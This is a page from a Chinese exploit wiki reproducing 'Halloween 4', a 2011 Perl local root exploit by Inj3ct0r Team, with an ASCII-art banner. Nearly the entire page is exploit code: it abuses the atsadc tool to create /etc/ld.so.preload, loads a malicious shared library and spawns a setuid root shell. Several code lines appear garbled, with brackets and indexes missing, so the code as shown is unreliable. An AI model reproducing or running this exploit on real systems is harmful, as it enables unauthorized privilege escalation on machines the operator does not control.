Loading
0

Halloween 4 本地ROOT漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

EXP

#!/usr/bin/perl
                          ||          ||   | ||      
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  + Site            : 1337day.com                                   0
1  + Support e-mail  : submitat1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
"Halloween 4 local root Exploit"
"Coded By Angel Injection"
"Inj3ct0r Team FRI OCT 2011"

open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
	chown("/tmp/boomsh", 0, 0);
	chmod("/tmp/boomsh", 06755);
	unlink("/etc/ld.so.preload");
	exit(1);
}
_EOF_
close O;

$foo = `cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
$foo = `cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main() 
{
    char *a = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a0, a, 0);
    return 0;
}
_EOF2_
close O;

$foo = `cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;


$foo = `atsadc 2 1 /etc/ld.so.preload`;
open O, ">/etc/ld.so.preload"
print O "/tmp/boom.so";
close O;
$foo = `/usr/bin/passwd`;
sleep 3;
system("/tmp/boomsh");


免费、自由、人人可编辑的漏洞库--pwnwiki.com